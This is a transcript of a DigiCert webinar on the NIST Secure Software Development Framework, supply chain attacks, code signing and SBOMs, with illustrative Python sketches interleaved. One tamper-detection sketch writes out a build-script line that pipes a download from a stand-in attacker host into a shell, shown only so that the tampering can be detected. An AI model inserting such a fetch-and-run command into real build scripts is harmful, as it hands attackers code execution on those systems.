Video: Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity | Duration: 3608s | Summary: Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity | Chapters: Welcome and Introduction (25s), Introduction and Overview (99s), Software's Pervasive Impact (174s), Software Supply Chain Challenges (301s), Software Complexity Challenges (453s), Software Supply Chain (715s), Software Development Vulnerabilities (842s), Organizational Security Challenges (1183s), Preparing Security Policies (1632s), Defining Security Roles (1727s), Automating Security Policies (1830s), Securing Development Environments (1942s), Artifact Integrity Protection (2055s), Software Transparency Requirements (2199s), Automating NIST Practices (2358s), Secure Build Practices (2489s), DigiCert's Software Solutions (2612s), Conclusion and Q&A (2912s)
Transcript for "Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity":
Alright, I think we'll get started. Hi, everyone. Welcome to today's webinar on implementing the NIST Secure Software Development Framework. My name is Maddie, and I'll be your producer today. Before we get started, a few housekeeping details. I want to draw your attention to the engagement panel on the right-hand side of your screen. Please take a moment to locate the Q&A feature, and feel free to ask any questions you have. Our team of experts will monitor those questions during the webinar, and we'll do our best to address them. If you have any technical issues during today's session, please check your Internet connection and then try refreshing your browser. Chrome generally works best for this platform, but if you have any problems, feel free to email me at webinars@digicert.com and I'll do my best to help you. Finally, please note that this webinar is being recorded, and we will send you a link to the recording afterward. It's my pleasure to turn this over to Eddie Glenn, senior manager for Software Trust here at DigiCert. Eddie has been a great asset for us at DigiCert, and he has been developing software for longer than I've been alive, so hopefully you'll learn a thing or two from Eddie today. I'll turn the time over to him. Thanks. Thanks, Maddie. I didn't realize you're only 15 years old; you look great for your age. Hi, everyone. I'm really excited to be here. Software development and secure software development are passions of mine, and I know this topic can sound a little dry, at least from the title, but I'm going to try to keep it fun today, and I really hope you learn something. As Maddie said, please be sure to ask questions. I probably won't be able to see them until we get to the end, but definitely ask them throughout. So I'm going to cover a couple of things.
First, a quick introduction: why are we here, why are we having this conversation, and what are some of the challenges organizations face. Then I'm going to dive into what the NIST Secure Software Development Framework is and talk about the importance of leveraging automation to implement some of those best practices. Finally, at the very end, I'll mention a few ways that DigiCert can help you achieve those things, and then we'll get to the summary and Q&A. I remember when I started developing software: I was the single developer of our product, we wrote in assembly language, and the development time was about a year. If we put out new releases, it would be about a year between them. Software wasn't on phones at the time; software wasn't on tractors at the time. But it's all changed. In 2011, an essayist wrote that software is eating the world, and friends, I'd say that in 2024 software has eaten the world. No matter where you look, no matter what industry you're involved with, software is a key component of how that industry operates. It's either something your company delivers to its customers, something your company depends on for its infrastructure, or the product itself, even live entertainment. Software is a key component of live entertainment these days. That's one of the things I really like about being able to talk to the industry and the market: such a wide variety of people are developing different kinds of software applications and using software in different ways. But software has definitely eaten the world, and practically every business is now considered a software business.
But there's a problem with this, and that is the bad guys: hackers, state-sponsored actors, cyber terrorists, cyber criminals. They're trying to attack that software infrastructure, and they're doing it in extremely novel, very innovative ways, and they're hard to stop. This slide shows some of the examples. These are all victims, and I really don't like victim shaming, because any of us is at risk of having our software come under attack, whether you're a small company with only a few developers or a mega corporation that gets impacted because some software your company relies on was infected. These are all great companies, and they've all had issues with their software being attacked. And that's why frameworks like NIST's become so important: we have something to fall back on in terms of what the best practices are, what others in the industry are doing, and what an organization like NIST thinks should be done to help secure software development. Just to give you an idea of the magnitude: 91% of businesses last year reported that they had a software supply chain attack. That's a huge number. Before I saw the statistic, I thought it was probably 50%, maybe 60%, but I was really surprised that Data Theorem is reporting 91%. But you've got to step back for a minute and ask why it is so hard to stop these attacks, and I think there are several reasons. The first reason is that modern software is complex, and I've got a slide on that I'll switch to in just a minute. When I first started developing software, it was simple. All the software came from my head; it didn't come from another person or a third party. It was hosted on a physically secure device, so there was no way someone on the Internet could come in and hack it.
It was a couple of thousand lines of code, so relatively small, and we had five people reviewing the code that I wrote. So it was very safe and very secure, but that's not how modern software is today. There are so many characteristics of modern software that can enable software supply chain attacks. The other issue I think we all experience is that even though we may have very well funded product development teams, they're focused on generating revenue: new features, the competitive aspects of their product, getting it to market faster. And what often happens is that they skimp on security. Or there are security teams in place in an organization, but they're woefully understaffed; we'll talk about that in some detail. And then there's the range of attack surfaces, as we'll see in just a few minutes. It's extremely broad. In the old days, you might have one tool that helps prevent a certain kind of bug or a certain kind of attack, but today the attacks are so broad that it requires multiple best practices and multiple steps to prevent them. So, I talked about modern software being complex. Here's a component that a lot of software companies use: the Apache HTTP Server. By itself it has 2,000,000 lines of code. This is a picture of what some of the dependencies within the HTTP Server look like. The last time I looked, about 600,000 people had contributed to the source code, and this is a component that goes into someone else's application. If you're developing web software, you may be deploying this on your web server. So this is considered part of your application, because that's how your customers see it.
So already you have 2,000,000 lines of code, and you have no idea what's really inside it, who's contributed to it, or what has been done to that software. We frequently hear about vulnerabilities that were either intentionally or unintentionally added in and then later exploited. But if we think about just the software your company develops, it's very common today to have development teams spread around a company geographically: some in the Americas, some in EMEA, some in Asia Pacific, all over. I've talked to customers with 50 different development teams around the world and thousands of software developers. Just that level of complexity makes it really hard to secure what every one of those individuals is doing, and that adds to what makes securing this so difficult. Then there are extremely large code bases. In the old days, when I was writing software, a couple of thousand lines of code, maybe 10,000, was considered extremely big. But when we take into account the number of third-party libraries we're pulling in, the amount of code we're writing, object-oriented techniques where one version of a data structure is made like another version but different, open source software, and source code coming from third parties, it's an extremely large code base, and that really opens up the attack vector: an attack could happen to any part of that software. It's also being deployed on multiple platforms. I talked about how my little software application went into one physical device, physically isolated from every other physical device. Today, that's not necessarily true.
People are writing software that's going to run on a Windows machine, or a macOS machine, or a Linux machine, or up in the cloud, so there's software that has to run in all these different environments. It's also a multi-development-environment world: some of your developers are using one set of tools to develop a Windows application, while another team is using a different set of tools to develop a Linux or iOS application. So even the development environments are complex. We talked about the supply chain being large, and then there are lots of dependencies. Known dependencies are not bad; at least we know about them. But I think what we'll uncover is that there are a lot of dependencies in our software that we just aren't aware of. The other thing that's changed is that we're now employing methodologies like DevOps and continuous integration/continuous delivery, which means we're expecting our developers to release new versions of software on a very frequent basis. It's no longer once a year; at some point it became once a quarter, then once a month, and now I talk to customers who are doing it several times a day. When you have that much happening, it's hard to implement security if it's not automated, which we'll talk about in just a few minutes. And the other issue that adds to the complexity of software is that it's used globally now. It's no longer an application written for an American audience or a French audience; it's an application that's probably going to be used around the world, especially with cloud-native platforms and software as a service.
So that means we have to do more to our software to ensure that it meets certain regulatory compliance requirements wherever it's being used globally. I talked about the software supply chain, and I want to dig into that in a little more detail, because I know a lot of you, especially on the security side of the house, may not completely understand what goes into building software. Any software application usually pulls software components from one of these four areas. Internally, there's new code being written in house. It might be written by your team in India and your team in Florida, but it's still developed in house, so you have a fair bit of control over it. More than likely, though, you're going to have a large component of software that's considered legacy, meaning more than three or four years old, which means the original developers are probably no longer around. The implication is that there are a lot of unknowns about that software. That's what we see on the right-hand side of the screen: software coming from internal sources. But then we've got software coming from external sources. That could be open source software, which is highly leveraged these days because it does increase our productivity: it allows us to create much more complex software applications without actually having to write that software, because we can reuse commonly available components. And then there's also lots of third-party commercial software: things that might come from Microsoft, or libraries from Apple that support graphics, and so on.
So the supply chain is very complex, and the thing to keep in mind here is that an attack can happen in any of these quadrants and potentially impact your application. Let's say there was a vulnerability in the HTTP Server, an open source component you're using in your application. To your customer, it doesn't really matter that it came from open source software; their perspective is that you infected them with malware, because what you deployed wasn't safe. That's why it's really important to keep in mind that this software is coming from multiple locations. And I'm kind of embarrassed to show this diagram because it's so basic. But again, as a software developer, it's basic to me; when I talk to a lot of our security customers, they don't completely understand how software gets made, and sometimes I find it's useful to get us all on the same page because it helps explain how these attacks work. There's a process: you write code, you build it, you package it, it gets sent to a customer. And with DevOps or continuous integration/continuous delivery, this process just repeats over and over again. Then there's another aspect to this: third-party code gets pulled in. Sometimes it's pulled in and modified, so it's back in that write-code part, or it gets pulled right into the build process, where nothing is done to it. So this is a very high-level, very simplistic view of how software gets developed. But what we need to be aware of is that all of these locations throughout this process are possible attack surfaces for a cyber criminal or cyber terrorist. For example, we've talked about the fact that we leverage open source code or third-party code.
There could be intentionally hidden malware in that code, sitting in some repository your developers are downloading from. Because it's so much code, they don't have a chance to really go through it and analyze whether malware is present. There could be unknown vulnerabilities in that third-party code, or it could be a compromised dependency. This starts to get a little complex on the software development side, but think of it like this: I download a package that draws a circle on my screen, and that's all it does. But then it pulls in another package that I'm not aware of, because it needs that circle drawn with a particular hardware driver. All of a sudden I have a dependency I'm not aware of, and that dependency could have the same things happening to it. You can see how it just builds and builds; it can become really nested. So this compromised-dependency problem becomes really important. There's also the possibility that someone could break into your development environment and compromise the source code your developers have written. Many things happened with SolarWinds, but this was one of them: someone was able to get credentials into their development systems and actually changed source code to add in malware, and no one within SolarWinds knew. That's another way for a vulnerability to get added in. If we look at the build, this happened recently with a video card company called MSI. They released the drivers and firmware for their particular video chip and didn't realize they had stored private code signing keys, provided by Intel, in those releases. It exposed those keys, which effectively allows a third party to sign software and make it look like it came from Intel.
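The nested-dependency problem described here can be sketched in a few lines of Python. All of the package names below are made up for illustration; the point is that the application declares one dependency but transitively trusts several more it never sees.

```python
# Hypothetical dependency graph: package -> direct dependencies it declares.
DEPS = {
    "my-app":      ["circle-draw"],
    "circle-draw": ["hw-driver"],    # pulled in silently by circle-draw
    "hw-driver":   ["legacy-blob"],  # nested one level deeper still
    "legacy-blob": [],
}

def transitive_deps(pkg, deps):
    """Return every package reachable from pkg, direct or nested."""
    seen = set()
    stack = list(deps.get(pkg, []))
    while stack:
        d = stack.pop()
        if d not in seen:
            seen.add(d)
            stack.extend(deps.get(d, []))
    return seen

# my-app declared one dependency but actually trusts three packages.
print(sorted(transitive_deps("my-app", DEPS)))
```

A compromise of any package in that set, not just the one declared, ends up inside the application.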
So there's the possibility of exposed secrets, and this happens more frequently than not, especially since we're leveraging automation to make things go faster. Then there are compromised builds. An attacker could go into your build system. A build system is usually a set of computer instructions, a script that says: pull these pieces in from all these different locations, and this is what we need to do to build the thing we're going to deliver. Well, attackers can actually modify that. Instead of pulling in the third-party code you've already vetted and believe is secure, they can modify your build and change it. This happens, and there's public evidence of a compromise that occurred using that technique. And finally, and this was actually the first kind of cyberattack on software, there's changing binary images. If you go back to the days when it became a big deal to upload programs to the Internet for other people to download, we quickly found out that malicious actors could modify that executable, add some malware to it, and people wouldn't know whether it came from you or from them. That's when we began using something called code signing, to ensure that the software is authentic, that it comes from where it says it comes from, and that it can't be tampered with. That was the end of the process, but it's one of the older techniques used to attack software supply chains. And then the process ends up at your users. The users could be your customers, people internal to your organization, customers you sold to, or partners and other parts of your extended ecosystem.
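The tampered-binary problem that code signing addresses can be illustrated with a simplified stand-in. Real code signing uses asymmetric keys and certificates; the sketch below uses only digest pinning with the standard library's `hashlib`, which shows the detection idea (any byte change is caught) but not the identity guarantee a certificate provides. The byte strings are placeholders.

```python
import hashlib

def sha256_of(data: bytes) -> str:
    """Digest of the exact bytes; changes if even one byte changes."""
    return hashlib.sha256(data).hexdigest()

# Publisher records the digest of the exact bytes it released.
released = b"binary image v1.0"
pinned = sha256_of(released)

# Consumer recomputes the digest before trusting what it downloaded.
tampered = b"binary image v1.0 + malware"
assert sha256_of(released) == pinned   # untouched copy checks out
assert sha256_of(tampered) != pinned   # modified copy is caught
```

Signing adds the missing piece: the digest itself is protected by a private key, so an attacker cannot simply replace both the binary and its published hash.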
They need to know what was really delivered to them. You claim you have no bugs; you claim you have no security flaws; you claim this is the list of components in the software package you delivered. But is that really true? So there's that issue as well. It's an extremely broad attack surface. Now I want to move into organizational challenges. We've talked about software complexity, but along with it comes people complexity. We've got teams of developers using different sets of tools: a team developing mobile software, Linux software, Java software. They're using different kinds of tools and different methodologies. The one thing they do have in common is that they're being pressured to do more in less time: get out more new features, but with less time to do it. And security is probably low on their list of priorities. But then we have to think about the bigger organization. If you work for a fairly large enterprise, you probably have a team of people that handles your PKI administration. If you have TLS certificates for your websites or your data servers, this team is probably helping the IT part of the company make sure those certificates are valid, or helping individual software teams ensure they have the right code signing certificates. You hopefully also have a team focused on product software and enterprise security. They're the ones thinking about that attack surface; even if you as a developer aren't thinking about it, this team is. They're asking: what do we need to have our software development teams do to ensure our company is safe from these kinds of attacks?
And then you probably have another team that doesn't get involved too often, but when they do it's really important: an audit team, or a team trying to comply with external regulations, or even internal compliance. The thing is, these teams are all very isolated. In a traditional environment, they're isolated from what's happening within development, and there's often a many-to-one relationship: you have thousands or tens of thousands of developers, but only a few people supporting PKI or doing product security. How can they enforce product security policy across that many developers? This is an organizational challenge that I think is a significant contributor to the weak spots that allow supply chain attacks to occur. There are actually four outcomes, I think, from this setup, from the complexity of modern software to the way the people are organized. The people down here who need broad visibility into everything happening up here don't have that visibility, and they don't have enforcement. Let's say the security team wants every software product that ships to be scanned for vulnerabilities and malware. Usually the only way they can enforce that is to write a policy in some document, and then they have to count on the development teams following that document. That doesn't happen. People forget; people intentionally skip it. So there's really no way for these people to enforce this today, and they don't have that visibility. If a vulnerability is discovered externally and reported to this team, there are probably no centralized records for them to go to and ask: where did this actually happen?
And this is one of the things the industry discovered with SolarWinds. A great company, but they just did not have that visibility across all their different development teams. So when they went to try to remediate and figure out what happened, it was a major challenge that took a lot of forensics. If they had had infrastructure in place that recorded these security activities, it would probably have been easier for them. Then there's successful tampering. We talked about the fact that attackers can change source code, build scripts, and configuration files. If those are changeable and no one notices, that's going to be a big problem: it means your software supply chain has been successfully tampered with. Or there are the hidden threats that are either in your code or in third-party code you've used. And finally, we get this issue around lack of transparency. A lot of regulations in multiple countries now, including the executive order that President Biden signed a few years ago, basically require software providers to be very forthcoming about what's in their software, and they do that through something called an SBOM. It stands for software bill of materials, and it's basically a recipe list of all the software components in the product. The intention is to let a user of the software answer: a vulnerability was just discovered last week; am I impacted or not? But in today's organizations that transparency isn't there, so it's really hard to provide it for your customers. Okay. I just talked about a ton of problems and a ton of scary things, and there are lots of ways to address them. I find this really encouraging, and I hope you do too. There are different frameworks available. I happened to pick this one because I think it's generic.
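The "am I impacted?" question an SBOM answers can be shown with a tiny sketch. Real SBOMs use standard formats such as SPDX or CycloneDX; the minimal dictionary below, and the component names and versions in it, are made up purely for illustration.

```python
# Hypothetical SBOM: a recipe list of components and their versions.
sbom = {
    "application": "example-app",
    "components": [
        {"name": "apache-httpd", "version": "2.4.49"},
        {"name": "zlib", "version": "1.2.11"},
    ],
}

def affected(sbom, vuln_name, vuln_versions):
    """Check the SBOM against an advisory: is any listed component hit?"""
    return any(
        c["name"] == vuln_name and c["version"] in vuln_versions
        for c in sbom["components"]
    )

# An advisory lands for apache-httpd 2.4.49/2.4.50 -- are we exposed?
print(affected(sbom, "apache-httpd", {"2.4.49", "2.4.50"}))  # True
print(affected(sbom, "zlib", {"1.2.12"}))                    # False
```

Without the SBOM, answering that question means forensics across every team; with it, the lookup is mechanical.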
I think it has great insights and some great suggested best practices. If you work in automotive, you probably have your own framework you need to follow to help with regulatory compliance. If you work in medical, the FDA has a framework. But the thing I've noticed with all the frameworks is that there's a lot of commonality between them; the best practices don't vary that much. So I like this particular framework. It's the Secure Software Development Framework that NIST put together as a result of that executive order I mentioned from President Biden, and I think it's a very good general set of best practices. I just want to walk through some of them. I'm not going to get into a lot of detail, because that's when this webinar could get really boring, but we're going to provide you the slide deck so that you have it. And after I walk through some of the best practices, I want to close with a few minutes on how DigiCert can help you with some of those things. The Secure Software Development Framework is broken into four sections. One: prepare the organization. That makes sense; just like when you're writing software, you do some design and requirements work first. Then: protect the software. Make sure you have an infrastructure in place that's hard to infiltrate, to penetrate. They have a lot of best practices around what you can do to protect it. Then they suggest that you produce well-secured software. Obviously that should be a given, but it's part of what they recommend, and they have some good best practices for how to do it.
And then finally, they know that even if you follow all these best practices, it's not going to stop 100% of the problems. So you need a system in place for how you're going to respond should a vulnerability or threat be discovered after you've released the software. We're going to walk through each of these at a high level. Again, there's a lot of text on the slides; I'm just going to focus on what I think are the most important aspects, but you'll have the slides to reference later. First, preparing the organization. If you're on the software development side of the fence, this should be really obvious: before you start writing software, you do a design, you do requirements. All this says is to define what the security policies are up front, before software development begins, because there are lots of things that can be done during the software development process to take those security policies into account. This includes the infrastructure you're going to use. Are you going to use GitHub or GitLab? Are you going to deploy to Azure or AWS? Are you going to use the compiler provided by Microsoft, or the Java compiler provided by Oracle? This set of test tools or that set? What configuration management tools are you going to use? All of those things are part of your infrastructure. Where are you going to build your software? Is it going to be built on an internal data server or in the cloud? How are you going to protect that? And what should the security policies be, not only for the software your organization writes itself, but for any software written by third parties? Because we know you're going to include software that comes from third parties.
So you need to know in advance what your own internal security policies are, so that you can inform your software development teams: if you're going to use third-party open source, you need to make sure they do this, this, and this, because these are our requirements for security, and we need to ensure our providers are doing the same thing. The next aspect also seems really obvious to me, but I know a lot of customers I talk to don't do it: define security roles and responsibilities. This basically boils down to least-privilege access. Everyone shouldn't have access to everything. I'll use code signing as an example. There should be a role that has access to a particular code signing key. There should be a completely separate role with the authority to say when that key can be used. Very separate. One role has the ability to compile, build, and produce a given application; that role does not have the ability to build a different application, which belongs to another role. And you set up these roles and responsibilities throughout the organization. Code signing is one aspect; being able to create a software bill of materials is another kind of role that should be reserved for very specific individuals. When you start to tighten up who has access to what, it starts to secure your infrastructure. Who has access to modify the build scripts? There should probably be only one person, and that should be especially protected. So, as part of this preparation, you have to define those roles and what the responsibilities are.
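The separation of duties described here can be sketched as a role-to-permission map. The role and permission names below are hypothetical; the point is that each role holds only the permissions it needs, and related duties (holding a key versus approving its use) are deliberately split.

```python
# Hypothetical least-privilege role map.
ROLES = {
    "signer":        {"use-signing-key:app-a"},
    "key-approver":  {"approve-key-use:app-a"},  # separate from the signer
    "builder-app-a": {"build:app-a"},
    "builder-app-b": {"build:app-b"},            # cannot build app-a
}

def allowed(role, permission):
    """True only if the role was explicitly granted the permission."""
    return permission in ROLES.get(role, set())

assert allowed("builder-app-a", "build:app-a")
assert not allowed("builder-app-a", "build:app-b")     # other application
assert not allowed("signer", "approve-key-use:app-a")  # separated duty
```

Compromising any one credential then exposes only that role's narrow slice, not the whole pipeline.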
The next one is also kind of obvious, but plainly stated: you need to select and use tools that support your software development process, and you should select them so that they mitigate some of the risk. They definitely need to provide automation. I talked about security policies: if they're written down in a Word document that you send to all your developers, saying you need to follow these security policies for how you develop software, no one's going to do it. They'll forget, either intentionally or unintentionally. Instead, you need tools and infrastructure in place that automate the enforcement of those policies. You also need security policies for the tools themselves. If your software relies on a particular software development tool, that tool becomes as critical as the software you're developing, so it needs the same kind of security policies in place. Then, generate intermediate artifacts to support your security policy. Again, go back to the example of SolarWinds: they didn't necessarily create internal artifacts that would show the path of how the cyber criminals went from point A to their objective at point C. It's really important to build intermediate steps into your process all along the way, saving those artifacts so that if there is a later breach, there is a way to come back, remediate, and discover what happened. And the last part of preparing the organization, before I move on to the next section, is to define criteria, especially things like KPIs, to help manage your risk. The common one is: how many P1 bugs can the software be released with?
But there's also, if you're doing vulnerability scanning, the need for a policy around whether you allow any software to be released with a known threat or vulnerability in it at the P1, P2, or P3 level. These are things you need to define up front. You need to define up front what the process is for getting an exception, if an exception is needed, and who approves it. Again, we go back to tool automation: these things need to be automatically enforced so that they're just part of the build process, with tools to help with that automated decision-making so that we don't get in the way of the developers. Only if there's a problem do we get in the way of developers releasing. And then secure your software development environments. One of the newest things is to use ephemeral build platforms. These are cloud-based platforms that exist only for the duration that software is being built. As soon as the software is done being built, the platform is taken back down and reset to a known state; the next time a build happens, it comes back up again. Separate your systems for production use, development use, and test use. Keeping them separate helps with isolation. Minimize human access to the toolchains that are used; only a few people should have the authority to install a new version of a critical software development tool. Okay. So how do we protect the software? Now we're in software development: what are some of the best practices for protecting the software?
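The vulnerability-gating policy described above (block P1/P2 findings unless an exception was approved) can be sketched as an automated release gate. This is an illustrative sketch, assuming hypothetical severity labels and a `waived` flag for approved exceptions; a real gate would read findings from your scanner's output.

```python
# Hedged sketch of an automated release gate on vulnerability severity.
# Severity labels ("p1".."p3") and the waiver mechanism are illustrative.
from dataclasses import dataclass

@dataclass
class Finding:
    component: str
    severity: str        # "p1", "p2", or "p3"
    waived: bool = False  # True if an exception was formally approved

BLOCKING_SEVERITIES = {"p1", "p2"}  # the policy defined up front

def release_allowed(findings) -> bool:
    """Block the release if any unwaived finding is at a blocking severity."""
    return all(f.waived or f.severity not in BLOCKING_SEVERITIES
               for f in findings)

findings = [
    Finding("libfoo", "p3"),               # low severity: does not block
    Finding("libbar", "p1", waived=True),  # blocking, but exception approved
]
print(release_allowed(findings))  # True
```

Because the check runs as code inside the pipeline, the policy is enforced on every build and developers only hear about it when something actually blocks, which is the "stay out of the developers' way" goal described above.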
In the early days, I talked about how the early attacks modified that final executable at the end, and we responded by creating code signing, which let us digitally sign that final executable so that it couldn't be tampered with and so that consumers would know it was authentic, that it came from the source it claimed to come from. That's no longer enough. If you think back on the build process, you've got people writing software, building it, packaging it, and so forth. Artifacts are generated throughout that entire process. And as we've talked about, attackers are focused on every part of that process, so you really need a way to ensure that all those artifacts, as they move through your software development life cycle, can't be tampered with. This includes source code, intermediate executables, libraries, scripts, and configuration as a service (I got that misspelled on the slide: CAC should be CAS, configuration as a service). A lot of tools these days are configured through a script, basically. These should all be stored in a repository and digitally signed so they can't be modified unless we know they're supposed to be modified by an authorized person. That's extremely important to prevent some of the attacks that have happened throughout the software development life cycle. And then, obviously, some related practices: make sure the owners or originators, the authors of the code and of these intermediate artifacts, review and approve any changes; use code signing to protect the artifacts themselves as well as the integrity of the executables. NIST actually calls out using cryptography, and again, that goes back to code signing.
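One way to make "no artifact can be silently modified" concrete is an integrity manifest over every artifact in the pipeline. This is a simplified sketch using plain SHA-256 digests, with in-memory byte strings standing in for real files; in practice the manifest itself would be code-signed, since an unsigned manifest could be tampered with too.

```python
# Sketch: tamper-evidence for intermediate artifacts via a digest manifest.
# Artifact names/contents are illustrative; a real manifest would be signed.
import hashlib

def build_manifest(artifacts: dict) -> dict:
    """Record a SHA-256 digest for every artifact produced by the pipeline."""
    return {name: hashlib.sha256(data).hexdigest()
            for name, data in artifacts.items()}

def find_tampered(artifacts: dict, manifest: dict) -> list:
    """Return names of artifacts whose bytes no longer match the manifest."""
    return [name for name, data in artifacts.items()
            if hashlib.sha256(data).hexdigest() != manifest.get(name)]

artifacts = {
    "main.c":   b"int main(void) { return 0; }",
    "build.sh": b"cc -O2 main.c -o app",
}
manifest = build_manifest(artifacts)

# An attacker quietly edits the build script mid-pipeline:
artifacts["build.sh"] = b"cc -O2 main.c -o app && curl attacker.example | sh"
print(find_tampered(artifacts, manifest))  # ['build.sh']
```

The detection relies on the digest, not on trust in the build machine: any change to source, scripts, or binaries between pipeline stages shows up as a mismatch.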
So cryptography is a great way to prevent these artifacts from being tampered with, and to identify and know when they have been tampered with. Doing that is preventative, but it also provides a mechanism to verify the integrity of a software release afterwards. For example, when we code sign the final executable, there's a hash associated with that executable, and the code signing signature can identify whether it's been changed or not. But being able to publish the hash so that an end user can actually compare it as well becomes important. And this is important not only for the final users but for all those intermediate artifacts throughout the software development life cycle; it's a way to add further verification along the process. And then this one, I think, is really important, and it's a change that's happening across the industry. The FDA is requiring it now for medical device software. The US government is requiring it for software that it uses in its critical systems; it wants software transparency for any software that it uses. So as a software manufacturer, you need to be able to provide that SBOM, that software bill of materials, which lists every component that goes into your software: whether you've written it, it's come from a third party as open source, or it's a third-party binary library. And this has to be shared with the consumers of that software. It's important because it helps protect the integrity of the software development life cycle. One thing I'll mention here that makes this important is that SBOMs are going to become a critical part of what you deliver to your customers.
But what happens if a hacker comes in and modifies an SBOM? Let's say they were able to successfully insert a vulnerability or hide malware; they could go into that SBOM, change it, and delete the entry so it's not seen. So the SBOM becomes an artifact that also needs to be digitally signed so it can't be tampered with. And this area here: produce well-secured software. This also seems like an obvious thing that everyone should be doing, but there are some best practices around it. One of them is to utilize threat modeling, attack modeling, and vulnerability detection. Because we are relying so much on third-party software, we need to make sure we are using tools that can analyze that software both at the source code level and at the final binary level to ensure that, at least for known threats, we can identify them. If there are aspects of the tools you use that help increase security, take advantage of them. Make sure that your developers follow secure coding practices; these coding practices should have been defined up front, in the preparation part. Likewise, use code reviews to help ensure those coding practices have been followed. And then finally, how does one respond to a vulnerability? No matter how many precautions we take, something is going to happen; no matter how well you test your software, there's always going to be a bug in it. NIST recognizes this, and they have some best practices. They rely heavily on the fact that SBOMs are going to be created for all the software that's consumed, because if a vulnerability is discovered in a common component that's used across the industry, then everyone will be able to know whether their software has been impacted by that vulnerability. There are public databases now that track these vulnerabilities.
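The SBOM-tampering scenario above can be made tamper-evident with the same digest idea: publish a digest (or better, a signature) of the canonical SBOM document, so deleting a component's entry is detectable. This is a loose sketch shaped vaguely like a CycloneDX document; the field names, component list, and hash-only scheme are illustrative, and a real SBOM would carry a proper digital signature.

```python
# Sketch: a minimal, tamper-evident SBOM. Structure is only loosely
# CycloneDX-shaped and the digest stands in for a real signature.
import hashlib
import json

def make_sbom(components: list):
    """Build a canonical SBOM document and a digest over its serialized form."""
    doc = {
        "bomFormat": "CycloneDX",          # illustrative format label
        "components": sorted(components, key=lambda c: c["name"]),
    }
    payload = json.dumps(doc, sort_keys=True).encode()  # canonical serialization
    return doc, hashlib.sha256(payload).hexdigest()

def sbom_intact(doc: dict, digest: str) -> bool:
    """Re-serialize the document and compare against the published digest."""
    payload = json.dumps(doc, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest() == digest

sbom, digest = make_sbom([
    {"name": "libzip", "version": "1.9.2"},
    {"name": "openssl", "version": "3.0.8"},
])
sbom["components"].pop()          # attacker hides a component from the SBOM
print(sbom_intact(sbom, digest))  # False: the tampering is detected
```

Canonical serialization (sorted keys, sorted components) matters here: without it, two byte-different encodings of the same SBOM would produce different digests and cause false alarms.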
And then NIST recommends that you use tools to automate this, because it's obviously not something that can be done manually. And create plans for what your company is going to do if a vulnerability is discovered: how do you notify your customers, and what steps are you going to take to remediate it? Just to summarize what NIST is saying: automation is essential for this to work. We're dealing with so many lines of code, so many different developers, and such short release cycles that there is no way we can have security built into our software development life cycle if automation isn't the main driver behind these tasks. This document is a great document; I really would encourage you to download it and read through it, but it's going to be really hard for you to implement any of these practices if you don't have infrastructure in place that automates the tasks described. And if I were to have one slide that says "this is what every development organization should be doing as best practices," one that summarizes the NIST framework, it's this: make sure that as part of every release cycle, you're doing threat detection, scanning for threats and for malware; you're securely signing software artifacts, like source code, build files, and scripts, as well as the final software executables, in a way that the process itself can't be attacked; and you're generating transparency for the software you produce. If this is done automatically, it's going to do a lot toward protecting you from the software supply chain attacks that are happening, using many of the recommended NIST practices.
And if we take this and dive down into a little more detail, these are some very specific best practices that NIST doesn't necessarily call out in these terms, but this is what it means. They talked about signing intermediate artifacts. What that means is that when you go to submit code into your source code repository, you sign it. Maybe you run an automated scan on it to make sure there are no known threats or vulnerabilities in there. During the build process, you make sure that your builds are reproducible, so that if you build with the same set of components this hour and don't change anything, next hour the build is going to produce the exact same executable. I talked about ephemeral builds: you don't keep your build environment online all the time; you only fire it up when you actually need to do a build. You're also doing threat detection during this process. During the build, you make sure that any keys, like private code signing keys, and any other private data or secrets stay safe and secure and aren't accidentally included in your build images. One of the things that happens so often, especially around some GitHub projects, is that people upload those private keys to GitHub and then they become public, so they're no longer private. Again, rely on automation for this. Do logging of the build: for every part of your build process, you should have a log created that tracks "I've done this, this, this, and this." Do static binary analysis: we talked about doing source code scanning here, but there's all that code that gets pulled into your final executable as binaries, so source code analysis isn't enough. You need to do static binary analysis as well. And you've got to sign the software.
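The leaked-private-key problem above is exactly what automated secret scanning catches before a commit or build-image publish. Here is a minimal sketch that looks only for PEM-style private key markers in a set of files; real scanners (and GitHub's own push protection) match many more credential formats, and the file contents below are invented for illustration.

```python
# Sketch of a pre-commit / pre-build secret scan for private key material.
# Only PEM key headers are matched here; real scanners cover far more.
import re

KEY_PATTERN = re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----")

def scan_for_secrets(files: dict) -> list:
    """Return the names of files that appear to contain a private key."""
    return [name for name, text in files.items() if KEY_PATTERN.search(text)]

files = {
    "README.md": "How to build the project...",
    "ci/deploy_key.pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...",
}
print(scan_for_secrets(files))  # ['ci/deploy_key.pem']
```

Run as a pre-commit hook or pipeline step, a check like this fails the build before the key ever reaches the repository or a build image, which is the automated enforcement the section keeps coming back to.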
And then when you package it up, you should create an SBOM. So it's quite a set of very practical things that can be done, and they're going to go a long way toward helping your organization stop a software supply chain attack. And then I said I wanted to end on, just quickly, how DigiCert can help you with this. We have a product called Software Trust Manager, and it's really built for solving the problems in this picture: where the organization doesn't have visibility or centralized enforcement; doesn't have a way to help prevent tampering anywhere in the process, be it a source code artifact, a build script, or the final executable; doesn't have threat detection; and lacks transparency across many different development organizations, with only a small team of people providing oversight. What we provide is a product, Software Trust Manager, that does provide that enterprise-wide visibility and enforcement. It provides verifiable authenticity throughout the software development life cycle. That means we can provide verifiable code signing certificates, private code signing certificates, and then manage those keys in a secure, industry-compliant way so that your development teams have easy access to them, but it's controlled and extremely secure. As part of our platform, we can integrate threat detection at both the source code level and the binary level so that it's just part of the build process. It doesn't slow the development teams down; they don't have to think, "I now have to do this extra step." It's just part of their build process. And then we have the ability to generate SBOMs, software bills of materials, as part of that process.
